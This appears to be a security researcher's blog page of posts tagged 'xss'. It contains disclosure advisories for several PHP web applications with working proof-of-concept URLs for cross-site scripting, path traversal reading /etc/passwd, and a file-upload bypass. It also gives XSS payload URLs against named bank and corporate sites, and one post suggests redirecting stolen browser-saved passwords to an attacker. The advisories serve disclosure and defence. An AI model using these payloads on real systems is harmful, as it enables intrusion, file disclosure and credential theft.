Results tagged “xss” from Just Another Hacker

--------------------------------------------------------------------------------------------
20120831 - Justanotherhacker.com : PHP Shell Detector - Cross site scripting
JAHx121 - http://www.justanotherhacker.com/advisories/JAHx121.txt
--------------------------------------------------------------------------------------------

PHP Shell Detector is a php script that helps you find and identify php shells. It also has
a "web shells" signature database that helps to identify "web shell" up to 99%. By using the
latest javascript and css technologies, php shell detector has a light weight and friendly
interface. The main features is that if you're not sure about a suspicious file, you may send
it to the websecure.co.il team.  After submitting your file, it will be inspected and if
there are any threats, it will be inserted into a "php shell detector" web shells signature
database and the next time this file will be recognized positively.
[ Taken from: http://www.emposha.com/security/php-shell-detector-web-shell-detection-tool.html ]


--- Vulnerability description ---
The shell detector script does not sufficiently sanitise filenames of detected shells or
suspicious files, resulting in cross site scripting.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Full
CVE: None
Vendor: Emposha - http://www.emposha.com/
Affected versions: 1.51 - earlier versions may also be affected.

--- Proof of Concept ---
Create a payload out of a file detected by the PSD script, ie:
root@localhost:~# mv htaccess.php  \<img\ src\=x\ onerror\=alert\(1\)\>.txt
Then scan the directory containing the renamed file.

--- Solution ---
There is no solution at this time.

--- Disclosure time line ---
31-Aug-2012 - Public disclosure

--------------------------------------------------------------------------------------------
20110713 - Justanotherhacker.com : Chyrp - Multiple vulnerabilties
JAHx113 - http://www.justanotherhacker.com/advisories/JAHx113.txt
--------------------------------------------------------------------------------------------

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern
[ Taken from: http://chyrp.net ]


--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Vendor: chyrp.net
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
Exploit:
http://domain/path/admin/?action=[XSS]
http://domain/path/includes/javascript.php?action=[XSS]
PoC:
The javascript.php xss can also be invoked through rewrite rules using the following querystring -
http://domain/path/?%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E;url=blah

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file resulting in cross site
scripting if register globals is on.
Exploit:
http://domain/path/admin/help.php?title=[XSS]&body=[XSS]

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.
Exploit:
http://domain/path/?action=[LFI]
PoC:
http://domain/path/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a php gotcha when using the return value of strpos in an if statement as matches on position 0
will result in a false negative.
Exploit:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../[PATH]
PoC:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
http://domain/path/includes/lib/gz.php?file=/themes/../includes/config.yaml.php


--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp version <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is restricted through javascript. Modify js in page
using firebug or via intercepting proxy to allow *.php upload. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing js is far easier.

PoC:
Appended ;*.php in script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

--------------------------------------------------------------------------------------------
20110525 - Justanotherhacker.com : Cross site scripting in Movable Type
JAHx112 - http://www.justanotherhacker.com/advisories/JAHx112.txt
--------------------------------------------------------------------------------------------

Movable Type is a professional publishing platform
[ Taken from: http://www.movabletype.org ]


--- Vulnerability description ---
The 'static' parameter to the comment script is not sufficiently sanitised which allows an attacker
to break out of the meta redirect url in the response, resulting in a cross site scripting attack.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Responsible
CVE: Unassigned
Movable Type BugID: #105441
Vendor: Six Apart Ltd - http://www.sixapart.com
Affected versions:
* Movable Type Open Source 4.x
* Movable Type Open Source 5.x
* Movable Type 4.x ( with Professional Pack, Community Pack )
* Movable Type 5.x ( with Professional Pack, Community Pack )
* Movable Type Enterprise 4.x


--- Proof of Concept ---
http://vuln.com/cgi-bin/mt-comment.cgi?__mode=handle_sign_in&static="><script>alert(document.cookie)</script>&logout=1&entry_id=


--- Solution ---
Upgrade to the latest versions of Movable Type 4 or Movable Type 5.
* Movable Type Open Source 4.36
* Movable Type Open Source 5.05
* Movable Type Open Source 5.1
* Movable Type 4.36( with Professional Pack, Community Pack)
* Movable Type 5.05( with Professional Pack, Community Pack)
* Movable Type 5.1( with Professional Pack, Community Pack)
* Movable Type Enterprise 4.36
* Movable Type Advanced 5.1

--- Disclosure time line ---
25-May-2011 - Advisory released
24-May-2011 - New version released
18-May-2011 - Patch produced
11-Jan-2011 - Vendor acknowledge vulnerability
08-Jan-2011 - Vendor notified through email

Verisign is proactive about xss

|
I found this a while back, and when I went to inform versisign, the hole had been closed. It's good to see that someone takes log analysis serious.
verisign-seal-xss.PNG

--------------------------------------------------------------------------------------------
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------


Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: http://feindura.org ]

--- Vulnerability description ---
Feindura CMS sufferes from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned direclty from user input and later used in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x &
 5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group
'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd

--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd

--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

Custom graudit signatures

|
Writing your own graudit signatures is relatively easy. Mastering regular expressions can be helpful, but in their simplest form a list of words will do. I have tried to document some of the common pitfalls that might creep up on you in my Ruxmon presentation, but I know how "useful" a single slide can be. I am catching up on graudit documentation and signatures is just around the corner. Until then, I thought I would share with you some of the databases I use when looking for low hanging fruit and want to reduce the information overload (noise) that you normally get from the php ruleset. Signatures after the break to avoid spamming rss readers.

In the spirit of openness the Apache foundation has released an excellent post mortem write up of their recent compromise. It started with a XSS attack leveraged through the issue tracking software they use (JIRA) and ended with complete root access on one server, limited access to another and a number of passwords compromised.

Read the entire story at https://blogs.apache.org/infra/entry/apache_org_04_09_2010
Robert Hansen is at it again. This time he has produced a very simple exploit that will steal passwords that are stored (remembered) in the browser.The code is very simple and works a treat for Firefox.

I would recommend this over the usual XSS alert boxes the next time you are demoing cross site scripting. Try it out at http://ha.ckers.org/weird/xss-password-manager.html. I haven't tried it in any browsers besides firefox, but even if you can't read it straight out of the DOM, you could always rewrite the form action url or even hook the onsubmit call to send the username and password to a destination of your choosing.
Unless you're living under a rock, you should have heard of the Common Weakness Enumeration (CWE)/SANS top 25 list. The second annual list was released some time ago and is always worth a read. The guys over at the application security street fighter blog is honouring this years list with a run down of the vulnerabilities and applicable solutions. As usual it's a no nonsense approach to describing the problem and solutions without going too far in depth. I would recommend this blog to any developer, so go have a read...right now :) Number #1 is cross site scripting (XSS),

http://blogs.sans.org/appsecstreetfighter/

XSS in whois

|
Like many other text only protocols XSS is often overlooked in whois. The rational behind this is simple, browsers aren't meant to query whois information. I have suspected that it's been possible for some time, but it wasn't until I did a whois on a domain registered through privacy--protect.com that I saw it in the wild for the first time.

$ whois anireactor.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: ANIREACTOR.COM
   Registrar: HEBEI INTERNATIONAL TRADING ( SHANGHAI) CO., LTD
   Whois Server: whois.hebeidomains.com
   Referral URL: http://www.hebeidomains.com
   Name Server: NS1.ISAACHOST.COM
   Name Server: NS2.ISAACHOST.COM
   Status: clientTransferProhibited
   Updated Date: 09-jan-2010
   Creation Date: 09-jan-2010
   Expiration Date: 09-jan-2011

>>> Last update of whois database: Thu, 28 Jan 2010 05:59:01 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domainname: ANIREACTOR.COM

Registrant:
   ANIREACTOR.COM
   Privacy--Protect.org
   P.O. Box 98
   Note - All Postal Mails Rejected, visit Privacy--Protect.org
   5066 Moergestel
   The Netherlands
   Tel.: +55.1137117371
   Email: ANIREACTOR.COM (at) privacy--protect.org

Administrative:
   ANIREACTOR.COM
   Privacy--Protect.org
   P.O. Box 98
   Note - All Postal Mails Rejected, visit Privacy--Protect.org
   5066 Moergestel
   The Netherlands
   Tel.: +55.1137117371
   Email: ANIREACTOR.COM (at) privacy--protect.org

Technical:
   ANIREACTOR.COM
   Privacy--Protect.org
   P.O. Box 98
   Note - All Postal Mails Rejected, visit Privacy--Protect.org
   5066 Moergestel
   The Netherlands
   Tel.: +55.1137117371
   Email: ANIREACTOR.COM (at) privacy--protect.org


Legal note:
PRIVACY--PROTECT.ORG is providing privacy protection services to
this domain name to protect the owner from spam and phishing attacks.
Privacy--Protect.org is not responsible for any of the activities
associated with this domain name. If you wish to report any abuse
concerning the usage of this domain name, you may do so at
http://privacy--protect.org/. We have a stringent abuse policy and
any complaint will be actioned within a short period of time.
<script>open('http://privacy--protect.org/');</script>

The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about
or related to a domain name registration record. We make this information
available "as is", and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful purposes
and that, under no circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress
or load this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail,
or by telephone.

The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar
of record is HebeiDomains.com. We reserve the right to modify these terms
at any time. By submitting this query, you agree to abide by these terms.


Request number 1 from 5 daily allowed from your IP address.
Email to trick bots (does not work)  ANIREACTOR.COM@hotmail.com



Notice the <script>open('http://privacy--protect.org/');</script> line? It causes a popup window to open if you query this through most web based whois clients.In all the previously posted material regarding XSS in whois there has been a call for the registrar to filter special characters in the registrant details. That is wrong! Whois is a text based protocol and in accordance with RFC 954 there is no need to filter input or encode output.The highlighted code in the example above is provided by the whois server itself, after the registrant details. Further more, the following is a valid whois query, but will lead to XSS in web based whois clients:


$ whois "<script>alert('xss');</script>.com"

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

No match for "<SCRIPT>ALERT('XSS');</SCRIPT>.COM".
>>> Last update of whois database: Sat, 30 Jan 2010 10:21:07 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and


Therefore, the only sane solution is to do the filtering on the web client side!

Bank of Queensland XSS

|

ING XSS

|
I found a XSS vulnerability in ING's australian website; ING - XSS - PoC.jpg
The proof of concept url used to illustrate the vulnerability is: http://www.ing.com.au/personal/Search.aspx?keyword=%27;alert(document.cookie);test=%27

XSS defacement mirror

|
Since xssed.org appears to be out of action there seems to be a need for an active xss defacement mirror. Some alternatives exist, such as the original XSS disclosure thread on sla.ckers.org or http://bugtraq.byethost22.com/. However these two sites don't offer the ease of use that xssed.org did with reporting xss.

If xssed.org cannot be brought back to life, this is what I would like to see in a defacement mirror:

  • Ability to submit post and cookie data or even tamper data xml
  • Automatic screen/browser-shot of the hole
  • Some level of community control to minimize the number of holes that needs to be moderated by admins
  • Automatic notification to the domain owner using postmaster, hostmaster, abuse, etc
  • Status indicator (validated, fixed, etc)
  • Automatic submission and validation by script src=http://xss-mirror/subandvalidate.js?username or similar technique
  • Published statistics; users, vulns, fixed, etc
I understand that there might be a business model involved here and things might not turn out quite like I had wished. Hopefully someone will take up the torch and either bring xssed back to life or start a new site to fill the gap left behind.
Westpac is so far the only bank I have tested which didn't filter their search field. Needless to say the smell of an xss casualty brings the zombies around..

westpac-xss-poc.png
The hole has been patched by westpac now. The url was:
http://search.westpac.com.au/search/search.cgi?collection=westpac&query=%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32,109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0

Pack of xss

|
I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au

No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.